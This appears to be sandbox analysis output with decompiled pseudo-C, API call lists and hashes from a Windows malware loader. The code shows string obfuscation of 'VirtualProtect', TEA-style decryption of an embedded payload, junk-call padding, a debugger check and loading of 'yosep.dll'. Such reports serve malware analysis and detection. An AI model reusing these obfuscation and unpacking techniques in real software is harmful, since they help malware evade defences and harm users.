                                                              • Part of subcall function 00406129: RtlEncodePointer.NTDLL(?,?,004061A2,00000000,0040A3A5,0042C5B0,00000000,00000314), ref: 00406190
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd
                                                            Similarity
                                                            • API ID: Value$EncodePointer__encode_pointer
                                                            • String ID:
                                                            • API String ID: 2585649348-0
                                                            • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                            • Instruction ID: e87044ab682afd9b7b1670cd61dbbbfcd87b06b4ecde40ab423a09c9dfcd5251
                                                            • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                            • Instruction Fuzzy Hash:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 250 40297f-402994 251 402996-4029a9 call 403b0a call 403ae9 call 403dc0 250->251 252 4029ae-4029f8 GetModuleHandleA GetProcAddress call 4028be 250->252 251->252 261 402a15 252->261 262 4029fa-402a13 252->262 263 402a17-402a1d 261->263 262->261 262->262 264 402a40-402a47 263->264 265 402a1f-402a3a GetCurrentThreadId VirtualAlloc ReadConsoleA 263->265 264->263 266 402a49-402a4e call 402834 264->266 265->264 269 402a50-402a56 266->269 270 402a58 call 4028a4 269->270 271 402a5d-402a64 269->271 270->271 271->269 273 402a66-402a69 271->273 274 402a6a-402a71 273->274 275 402a90-402a91 274->275 276 402a73-402a8a SetConsoleDisplayMode LockResource 274->276 275->274 277 402a93-402a98 275->277 276->275 278 402a99-402aa3 277->278 279 402ac5-402ac6 278->279 280 402aa5-402abf GetComputerNameW SetThreadExecutionState TlsSetValue 278->280 279->278 281 402ac8-402adb LoadLibraryW call 402973 279->281 280->279
                                                            C-Code - Quality: 77%
                                                            			E0040297F(void* __ecx) {
                                                            				void* _v6;
                                                            				long _v8;
                                                            				short _v2056;
                                                            				struct HINSTANCE__* _t10;
                                                            				_Unknown_base(*)()* _t11;
                                                            				void* _t14;
                                                            				struct HINSTANCE__* _t25;
                                                            				void* _t33;
                                                            				void* _t35;
                                                            				intOrPtr _t36;
                                                            				void* _t37;
                                                            				void* _t40;
                                                            				void* _t42;
                                                            
                                                            				_t35 = __ecx;
                                                            				if( *0x42e384 == 0x412) {
                                                            					E00403B0A(0);
                                                            					E00403AE9(0, 0);
                                                            					E00403DC0(0);
                                                            				}
                                                            				 *0x42e384 =  *0x42e384 + 0xb2d3b;
                                                            				_t10 = GetModuleHandleA("kernel32.dll");
                                                            				 *0x42e1d8 = _t10;
                                                            				_t11 = GetProcAddress(_t10, "LocalAlloc");
                                                            				 *0x42e14c = _t11;
                                                            				 *0x42e148 =  *_t11(0,  *0x42e384);
                                                            				E004028BE(_t35);
                                                            				_t36 =  *0x42e384;
                                                            				_t14 = 0;
                                                            				if(_t36 > 0) {
                                                            					do {
                                                            						 *((char*)( *0x42e148 + _t14)) =  *((intOrPtr*)( *0x42e388 + _t14 + 0xb2d3b));
                                                            						_t14 = _t14 + 1;
                                                            					} while (_t14 < _t36);
                                                            				}
                                                            				_t40 = 0;
                                                            				do {
                                                            					if(_t36 + _t40 == 0x5e) {
                                                            						GetCurrentThreadId();
                                                            						VirtualAlloc(0, 0, 0, 0);
                                                            						ReadConsoleA(0, 0, 0, 0, 0);
                                                            						_t36 =  *0x42e384;
                                                            					}
                                                            					_t40 = _t40 + 1;
                                                            				} while (_t40 < 0x40c893);
                                                            				E00402834();
                                                            				_t37 = 0;
                                                            				do {
                                                            					if(_t37 == 0x770e) {
                                                            						E004028A4(_t37);
                                                            					}
                                                            					_t37 = _t37 + 1;
                                                            				} while (_t37 < 0x286b97d);
                                                            				_t33 = 0x7b;
                                                            				do {
                                                            					if( *0x42e384 == 0xf) {
                                                            						_v8 = 0;
                                                            						asm("stosw");
                                                            						_push( &_v8);
                                                            						_push(0);
                                                            						_push(0);
                                                            						L0040392E();
                                                            						LockResource(0);
                                                            					}
                                                            					_t33 = _t33 - 1;
                                                            				} while (_t33 != 0);
                                                            				_t42 = 0x184cc;
                                                            				do {
                                                            					if( *0x42e384 == 0x1833b) {
                                                            						GetComputerNameW( &_v2056,  &_v8);
                                                            						__imp__SetThreadExecutionState(0);
                                                            						TlsSetValue(0, 0);
                                                            					}
                                                            					_t42 = _t42 - 1;
                                                            				} while (_t42 != 0);
                                                            				_t25 = LoadLibraryW(L"yosep.dll");
                                                            				E00402973();
                                                            				return _t25;
                                                            			}
















                                                            0x0040297f
                                                            0x00402994
                                                            0x00402999
                                                            0x004029a0
                                                            0x004029a9
                                                            0x004029a9
                                                            0x004029ae
                                                            0x004029bd
                                                            0x004029c9
                                                            0x004029ce
                                                            0x004029dd
                                                            0x004029e4
                                                            0x004029e9
                                                            0x004029ee
                                                            0x004029f4
                                                            0x004029f8
                                                            0x004029fa
                                                            0x00402a0d
                                                            0x00402a10
                                                            0x00402a11
                                                            0x004029fa
                                                            0x00402a15
                                                            0x00402a17
                                                            0x00402a1d
                                                            0x00402a1f
                                                            0x00402a29
                                                            0x00402a34
                                                            0x00402a3a
                                                            0x00402a3a
                                                            0x00402a40
                                                            0x00402a41
                                                            0x00402a49
                                                            0x00402a4e
                                                            0x00402a50
                                                            0x00402a56
                                                            0x00402a58
                                                            0x00402a58
                                                            0x00402a5d
                                                            0x00402a5e
                                                            0x00402a69
                                                            0x00402a6a
                                                            0x00402a71
                                                            0x00402a75
                                                            0x00402a7c
                                                            0x00402a81
                                                            0x00402a82
                                                            0x00402a83
                                                            0x00402a84
                                                            0x00402a8a
                                                            0x00402a8a
                                                            0x00402a90
                                                            0x00402a90
                                                            0x00402a93
                                                            0x00402a99
                                                            0x00402aa3
                                                            0x00402ab0
                                                            0x00402ab7
                                                            0x00402abf
                                                            0x00402abf
                                                            0x00402ac5
                                                            0x00402ac5
                                                            0x00402acd
                                                            0x00402ad3
                                                            0x00402adb

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004029BD
                                                            • GetProcAddress.KERNEL32(00000000,LocalAlloc), ref: 004029CE
                                                            • GetCurrentThreadId.KERNEL32 ref: 00402A1F
                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000), ref: 00402A29
                                                            • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00402A34
                                                            • SetConsoleDisplayMode.KERNEL32(00000000,00000000,?), ref: 00402A84
                                                            • LockResource.KERNEL32(00000000,00000000,00000000,?), ref: 00402A8A
                                                            • GetComputerNameW.KERNEL32 ref: 00402AB0
                                                            • SetThreadExecutionState.KERNEL32 ref: 00402AB7
                                                            • TlsSetValue.KERNEL32(00000000,00000000), ref: 00402ABF
                                                            • LoadLibraryW.KERNEL32(yosep.dll), ref: 00402ACD
                                                              • Part of subcall function 00403B0A: __wcstoi64.LIBCMT ref: 00403B16
                                                              • Part of subcall function 00403DC0: _doexit.LIBCMT ref: 00403DCC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd
                                                            Similarity
                                                            • API ID: ConsoleThread$AddressAllocComputerCurrentDisplayExecutionHandleLibraryLoadLockModeModuleNameProcReadResourceStateValueVirtual__wcstoi64_doexit
                                                            • String ID: LocalAlloc$kernel32.dll$yosep.dll
                                                            • API String ID: 1649761710-3699620503
                                                            • Opcode ID: 3abfe71ded4f46f35cbbda1fc2cde1482eb0394db2f97f634bb155367cdcef5a
                                                            • Instruction ID: 9b9f6138e887a4192517514cc06cfdbd3fc59b7e25ec7b7a1235e6f02078c316
                                                            • Opcode Fuzzy Hash: 3abfe71ded4f46f35cbbda1fc2cde1482eb0394db2f97f634bb155367cdcef5a
                                                            • Instruction Fuzzy Hash: E431E775A01120ABC731EB62AF4D99F3B68EF45315750003AF545F21E1DBBC4686CBAD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 85%
                                                            			E00405EC0(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                            				intOrPtr _v0;
                                                            				void* _v804;
                                                            				intOrPtr _v808;
                                                            				intOrPtr _v812;
                                                            				intOrPtr _t6;
                                                            				intOrPtr _t11;
                                                            				intOrPtr _t12;
                                                            				intOrPtr _t13;
                                                            				long _t17;
                                                            				intOrPtr _t21;
                                                            				intOrPtr _t22;
                                                            				intOrPtr _t25;
                                                            				intOrPtr _t26;
                                                            				intOrPtr _t27;
                                                            				intOrPtr* _t31;
                                                            				void* _t34;
                                                            
                                                            				_t27 = __esi;
                                                            				_t26 = __edi;
                                                            				_t25 = __edx;
                                                            				_t22 = __ecx;
                                                            				_t21 = __ebx;
                                                            				_t6 = __eax;
                                                            				_t34 = _t22 -  *0x4116f8; // 0x6abd1eb3
                                                            				if(_t34 == 0) {
                                                            					asm("repe ret");
                                                            				}
                                                            				 *0x42cdc8 = _t6;
                                                            				 *0x42cdc4 = _t22;
                                                            				 *0x42cdc0 = _t25;
                                                            				 *0x42cdbc = _t21;
                                                            				 *0x42cdb8 = _t27;
                                                            				 *0x42cdb4 = _t26;
                                                            				 *0x42cde0 = ss;
                                                            				 *0x42cdd4 = cs;
                                                            				 *0x42cdb0 = ds;
                                                            				 *0x42cdac = es;
                                                            				 *0x42cda8 = fs;
                                                            				 *0x42cda4 = gs;
                                                            				asm("pushfd");
                                                            				_pop( *0x42cdd8);
                                                            				 *0x42cdcc =  *_t31;
                                                            				 *0x42cdd0 = _v0;
                                                            				 *0x42cddc =  &_a4;
                                                            				 *0x42cd18 = 0x10001;
                                                            				_t11 =  *0x42cdd0; // 0x0
                                                            				 *0x42cccc = _t11;
                                                            				 *0x42ccc0 = 0xc0000409;
                                                            				 *0x42ccc4 = 1;
                                                            				_t12 =  *0x4116f8; // 0x6abd1eb3
                                                            				_v812 = _t12;
                                                            				_t13 =  *0x4116fc; // 0x9542e14c
                                                            				_v808 = _t13;
                                                            				 *0x42cd10 = IsDebuggerPresent();
                                                            				_push(1);
                                                            				E004091B5(_t14);
                                                            				SetUnhandledExceptionFilter(0);
                                                            				_t17 = UnhandledExceptionFilter(0x401a98);
                                                            				if( *0x42cd10 == 0) {
                                                            					_push(1);
                                                            					E004091B5(_t17);
                                                            				}
                                                            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                            			}



















                                                            0x00405ec0
                                                            0x00405ec0
                                                            0x00405ec0
                                                            0x00405ec0
                                                            0x00405ec0
                                                            0x00405ec0
                                                            0x00405ec0
                                                            0x00405ec6
                                                            0x00405ec8
                                                            0x00405ec8
                                                            0x0040a6e5
                                                            0x0040a6ea
                                                            0x0040a6f0
                                                            0x0040a6f6
                                                            0x0040a6fc
                                                            0x0040a702
                                                            0x0040a708
                                                            0x0040a70f
                                                            0x0040a716
                                                            0x0040a71d
                                                            0x0040a724
                                                            0x0040a72b
                                                            0x0040a732
                                                            0x0040a733
                                                            0x0040a73c
                                                            0x0040a744
                                                            0x0040a74c
                                                            0x0040a757
                                                            0x0040a761
                                                            0x0040a766
                                                            0x0040a76b
                                                            0x0040a775
                                                            0x0040a77f
                                                            0x0040a784
                                                            0x0040a78a
                                                            0x0040a78f
                                                            0x0040a79b
                                                            0x0040a7a0
                                                            0x0040a7a2
                                                            0x0040a7aa
                                                            0x0040a7b5
                                                            0x0040a7c2
                                                            0x0040a7c4
                                                            0x0040a7c6
                                                            0x0040a7cb
                                                            0x0040a7df

                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32 ref: 0040A795
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A7AA
                                                            • UnhandledExceptionFilter.KERNEL32(00401A98), ref: 0040A7B5
                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 0040A7D1
                                                            • TerminateProcess.KERNEL32(00000000), ref: 0040A7D8
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                            • String ID:
                                                            • API String ID: 2579439406-0
                                                            • Opcode ID: 3d7d3eec9a3fd2426ea4d5cbdc0aab05956cf272709b05de423caaa91d30f816
                                                            • Instruction ID: 2974f63649a1c9ba2073cb140afa8dc02fec11298bb61fbb0d4b08a460ec1183
                                                            • Opcode Fuzzy Hash: 3d7d3eec9a3fd2426ea4d5cbdc0aab05956cf272709b05de423caaa91d30f816
                                                            • Instruction Fuzzy Hash: 8A21C3B5A602059FD760DF25ED846583FB4FF88314F90443AE90897370D7B56A828F8D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 58%
                                                            			E004028BE(void* __ecx) {
                                                            				intOrPtr _v8;
                                                            				char _v12;
                                                            				struct HINSTANCE__* _t6;
                                                            
                                                            				_t6 = LoadLibraryA("kernel32.dll");
                                                            				 *0x42e1d8 = _t6;
                                                            				 *0x42d0b0 = 0x56;
                                                            				 *0x42d0b1 = 0x69;
                                                            				 *0x42d0b2 = 0x72;
                                                            				 *0x42d0b7 = 0x50;
                                                            				 *0x42d0bd = 0x74;
                                                            				 *0x42d0be = 0;
                                                            				 *0x42d0b3 = 0x74;
                                                            				 *0x42d0b4 = 0x75;
                                                            				 *0x42d0b5 = 0x61;
                                                            				 *0x42d0b6 = 0x6c;
                                                            				 *0x42d0b8 = 0x72;
                                                            				 *0x42d0b9 = 0x6f;
                                                            				 *0x42d0ba = 0x74;
                                                            				 *0x42d0bb = 0x65;
                                                            				 *0x42d0bc = 0x63;
                                                            				 *0x42e140 = GetProcAddress(_t6, 0x42d0b0);
                                                            				_v8 = 0x20;
                                                            				_v8 = _v8 + 0x20;
                                                            				return  *0x42e140( *0x42e148,  *0x42e384, _v8,  &_v12, __ecx, __ecx);
                                                            			}






                                                            0x004028c8
                                                            0x004028d4
                                                            0x004028d9
                                                            0x004028e0
                                                            0x004028e7
                                                            0x004028ee
                                                            0x004028f5
                                                            0x004028fc
                                                            0x00402903
                                                            0x0040290a
                                                            0x00402911
                                                            0x00402918
                                                            0x0040291f
                                                            0x00402926
                                                            0x0040292d
                                                            0x00402934
                                                            0x0040293b
                                                            0x00402948
                                                            0x0040294d
                                                            0x00402954
                                                            0x00402972

                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 004028C8
                                                            • GetProcAddress.KERNEL32(00000000,0042D0B0), ref: 00402942
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: $kernel32.dll
                                                            • API String ID: 2574300362-2116778257
                                                            • Opcode ID: eb7cc3dcad7fd642cee9cdcc13478540364151637f3bedb6abaea89dc8d7e197
                                                            • Instruction ID: 1eaf5cb0e818d45cad65fc96adac9ec62e658d76ba46d43f61fac26e64c648ff
                                                            • Opcode Fuzzy Hash: eb7cc3dcad7fd642cee9cdcc13478540364151637f3bedb6abaea89dc8d7e197
                                                            • Instruction Fuzzy Hash: 2111A870E0C2C0DEE722CB69FD087557EA66B2674DF9800B8D184562B2C3BA155B873F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00406E1E() {
                                                            
                                                            				SetUnhandledExceptionFilter(E00406DDC);
                                                            				return 0;
                                                            			}



                                                            0x00406e23
                                                            0x00406e2b

                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00006DDC), ref: 00406E23
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 13f742693bcbd04f8ee0903116d6ac8c950154b9ce705657eac7bc5df116bc29
                                                            • Instruction ID: 1363d427eb1f8dc8124538c81e308e39bbfcc94e00fbedef604c64db2dde4652
                                                            • Opcode Fuzzy Hash: 13f742693bcbd04f8ee0903116d6ac8c950154b9ce705657eac7bc5df116bc29
                                                            • Instruction Fuzzy Hash: 509002607711505AC6002B706D0DA0535A46E49746B520571B042F44A8DA7540519919
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 92%
                                                            			E00406290(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                            				struct HINSTANCE__* _t23;
                                                            				intOrPtr _t28;
                                                            				intOrPtr _t32;
                                                            				void* _t40;
                                                            				intOrPtr _t46;
                                                            				void* _t47;
                                                            
                                                            				_t35 = __ebx;
                                                            				_push(0xc);
                                                            				_push(0x40fe60);
                                                            				E0040487C(__ebx, __edi, __esi);
                                                            				_t45 = L"KERNEL32.DLL";
                                                            				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
                                                            				if(_t23 == 0) {
                                                            					_t23 = E00403B20(_t45);
                                                            				}
                                                            				 *(_t47 - 0x1c) = _t23;
                                                            				_t46 =  *((intOrPtr*)(_t47 + 8));
                                                            				 *((intOrPtr*)(_t46 + 0x5c)) = 0x401868;
                                                            				 *((intOrPtr*)(_t46 + 0x14)) = 1;
                                                            				if(_t23 != 0) {
                                                            					_t35 = GetProcAddress;
                                                            					 *((intOrPtr*)(_t46 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
                                                            					 *((intOrPtr*)(_t46 + 0x1fc)) = GetProcAddress( *(_t47 - 0x1c), "DecodePointer");
                                                            				}
                                                            				 *((intOrPtr*)(_t46 + 0x70)) = 1;
                                                            				 *((char*)(_t46 + 0xc8)) = 0x43;
                                                            				 *((char*)(_t46 + 0x14b)) = 0x43;
                                                            				 *(_t46 + 0x68) = 0x4118a8;
                                                            				E00406842(_t35, _t40, 1, 0xd);
                                                            				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
                                                            				InterlockedIncrement( *(_t46 + 0x68));
                                                            				 *(_t47 - 4) = 0xfffffffe;
                                                            				E00406365();
                                                            				E00406842(_t35, _t40, 1, 0xc);
                                                            				 *(_t47 - 4) = 1;
                                                            				_t28 =  *((intOrPtr*)(_t47 + 0xc));
                                                            				 *((intOrPtr*)(_t46 + 0x6c)) = _t28;
                                                            				if(_t28 == 0) {
                                                            					_t32 =  *0x411eb0; // 0x411dd8
                                                            					 *((intOrPtr*)(_t46 + 0x6c)) = _t32;
                                                            				}
                                                            				E00408D2A( *((intOrPtr*)(_t46 + 0x6c)));
                                                            				 *(_t47 - 4) = 0xfffffffe;
                                                            				return E004048C1(E0040636E());
                                                            			}









                                                            0x00406290
                                                            0x00406290
                                                            0x00406292
                                                            0x00406297
                                                            0x0040629c
                                                            0x004062a2
                                                            0x004062aa
                                                            0x004062ad
                                                            0x004062b2
                                                            0x004062b3
                                                            0x004062b6
                                                            0x004062b9
                                                            0x004062c3
                                                            0x004062c8
                                                            0x004062d0
                                                            0x004062d8
                                                            0x004062e8
                                                            0x004062e8
                                                            0x004062ee
                                                            0x004062f1
                                                            0x004062f8
                                                            0x004062ff
                                                            0x00406308
                                                            0x0040630e
                                                            0x00406315
                                                            0x0040631b
                                                            0x00406322
                                                            0x00406329
                                                            0x0040632f
                                                            0x00406332
                                                            0x00406335
                                                            0x0040633a
                                                            0x0040633c
                                                            0x00406341
                                                            0x00406341
                                                            0x00406347
                                                            0x0040634d
                                                            0x0040635e

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0040FE60,0000000C,004063CB,00000000,00000000,?,004075F1,?), ref: 004062A2
                                                            • __crt_waiting_on_module_handle.LIBCMT ref: 004062AD
                                                              • Part of subcall function 00403B20: Sleep.KERNEL32(000003E8,00000000,?,004061F3,KERNEL32.DLL,?,0040623F,?,004075F1,?), ref: 00403B2C
                                                              • Part of subcall function 00403B20: GetModuleHandleW.KERNEL32(?,?,004061F3,KERNEL32.DLL,?,0040623F,?,004075F1,?), ref: 00403B35
                                                            • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 004062D6
                                                            • GetProcAddress.KERNEL32(?,DecodePointer), ref: 004062E6
                                                            • __lock.LIBCMT ref: 00406308
                                                            • InterlockedIncrement.KERNEL32(004118A8), ref: 00406315
                                                            • __lock.LIBCMT ref: 00406329
                                                            • ___addlocaleref.LIBCMT ref: 00406347
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                            • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                            • API String ID: 1028249917-2843748187
                                                            • Opcode ID: 7daa365c4f1f3c6f5620963537f9db8d2fb6a0a2d92353cab0785856933f005d
                                                            • Instruction ID: c5f7f4d4a171d92e4fd546218ba084379517a2aa08b604ccda2bde3c11c0c46e
                                                            • Opcode Fuzzy Hash: 7daa365c4f1f3c6f5620963537f9db8d2fb6a0a2d92353cab0785856933f005d
                                                            • Instruction Fuzzy Hash: 4A1160719047059AD720AF7AD845B4ABBE4EF04314F10857FE99AB36E1CB789A40CB5C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 307 4026cf-402713 call 4026c5 310 40271a-40273b 307->310 311 402747-40274c 310->311 312 40273d 310->312 313 40274e-402759 InterlockedExchange 311->313 314 40275f-402799 call 4026cc 311->314 312->311 313->314 317 4027a1-4027b1 314->317 318 40279b GetTickCount 314->318 319 4027c3-402822 317->319 320 4027b3-4027bd OpenFileMappingW DeleteVolumeMountPointA 317->320 318->317 319->310 321 402828-402833 319->321 320->319
                                                            C-Code - Quality: 79%
                                                            			E004026CF(unsigned int* __edi, void* __eflags) {
                                                            				signed int _v8;
                                                            				signed int _v12;
                                                            				unsigned int _v16;
                                                            				signed int _v20;
                                                            				signed int _v24;
                                                            				signed int _v28;
                                                            				char _v32;
                                                            				char _v36;
                                                            				intOrPtr _v40;
                                                            				intOrPtr _v44;
                                                            				intOrPtr _v48;
                                                            				intOrPtr _v52;
                                                            				long _v56;
                                                            				intOrPtr _t66;
                                                            				intOrPtr _t67;
                                                            				intOrPtr _t70;
                                                            				intOrPtr _t71;
                                                            				intOrPtr _t75;
                                                            				unsigned int _t95;
                                                            				unsigned int* _t104;
                                                            				unsigned int _t105;
                                                            
                                                            				_t104 = __edi;
                                                            				_v16 =  *__edi;
                                                            				_t66 =  *0x412548; // 0x5f8ef9d
                                                            				_v48 = _t66;
                                                            				_t67 =  *0x41254c; // 0xbe1c42ae
                                                            				_t105 = __edi[1];
                                                            				_v52 = _t67;
                                                            				_v32 = 0;
                                                            				E004026C5( &_v32);
                                                            				_t70 =  *0x412550; // 0xf9fc55c0
                                                            				_v32 = _v32 + 0x23f;
                                                            				_v40 = _t70;
                                                            				_t71 =  *0x412554; // 0xc14a7208
                                                            				_v44 = _t71;
                                                            				_v36 = 0x20;
                                                            				do {
                                                            					_v24 = 2;
                                                            					_v24 = _v24 + 3;
                                                            					_v8 = (_v16 << 4) + _v40;
                                                            					_t75 =  *0x42e384;
                                                            					if(_t75 == 0xfa9) {
                                                            						 *0x42e1e4 = 0xedeb2e40;
                                                            					}
                                                            					if(_t75 == 0x3eb) {
                                                            						InterlockedExchange( &_v56, 0);
                                                            						 *0x42e144 = 0;
                                                            					}
                                                            					_v20 = _v16;
                                                            					_v20 = _v20 + _v32;
                                                            					_v12 = _v16 >> 5;
                                                            					 *0x42e1e0 = 0xf4ea3dee;
                                                            					E004026CC( &_v12, _v44);
                                                            					_v8 = _v8 ^ _v20;
                                                            					if( *0x42e384 == 0x9e6) {
                                                            						GetTickCount();
                                                            					}
                                                            					_v12 = _v12 ^ _v8;
                                                            					if( *0x42e384 == 0x213) {
                                                            						OpenFileMappingW(0, 0, 0);
                                                            						__imp__DeleteVolumeMountPointA(0);
                                                            					}
                                                            					_t105 = _t105 - _v12;
                                                            					_v28 = 2;
                                                            					_v28 = _v28 - 0x5396dd36;
                                                            					_v28 = _v28 + 0x5396dd38;
                                                            					_v8 = _t105 << _v28;
                                                            					_v8 = _v8 + _v48;
                                                            					_v20 = _v32 + _t105;
                                                            					_v12 = (_t105 >> _v24) + _v52;
                                                            					_v8 = _v8 ^ _v20;
                                                            					_v8 = _v8 ^ _v12;
                                                            					 *0x42d0e4 = 0;
                                                            					_v16 = _v16 - _v8;
                                                            					_v32 = _v32 + 0x61c88647;
                                                            					_t61 =  &_v36;
                                                            					 *_t61 = _v36 - 1;
                                                            				} while ( *_t61 != 0);
                                                            				_t95 = _v16;
                                                            				_t104[1] = _t105;
                                                            				 *_t104 = _t95;
                                                            				return _t95;
                                                            			}
























                                                            0x004026cf
                                                            0x004026d7
                                                            0x004026da
                                                            0x004026df
                                                            0x004026e2
                                                            0x004026e9
                                                            0x004026ee
                                                            0x004026f4
                                                            0x004026f7
                                                            0x004026fc
                                                            0x00402701
                                                            0x00402708
                                                            0x0040270b
                                                            0x00402710
                                                            0x00402713
                                                            0x0040271a
                                                            0x0040271a
                                                            0x00402721
                                                            0x0040272e
                                                            0x00402731
                                                            0x0040273b
                                                            0x0040273d
                                                            0x0040273d
                                                            0x0040274c
                                                            0x00402753
                                                            0x00402759
                                                            0x00402759
                                                            0x00402762
                                                            0x00402768
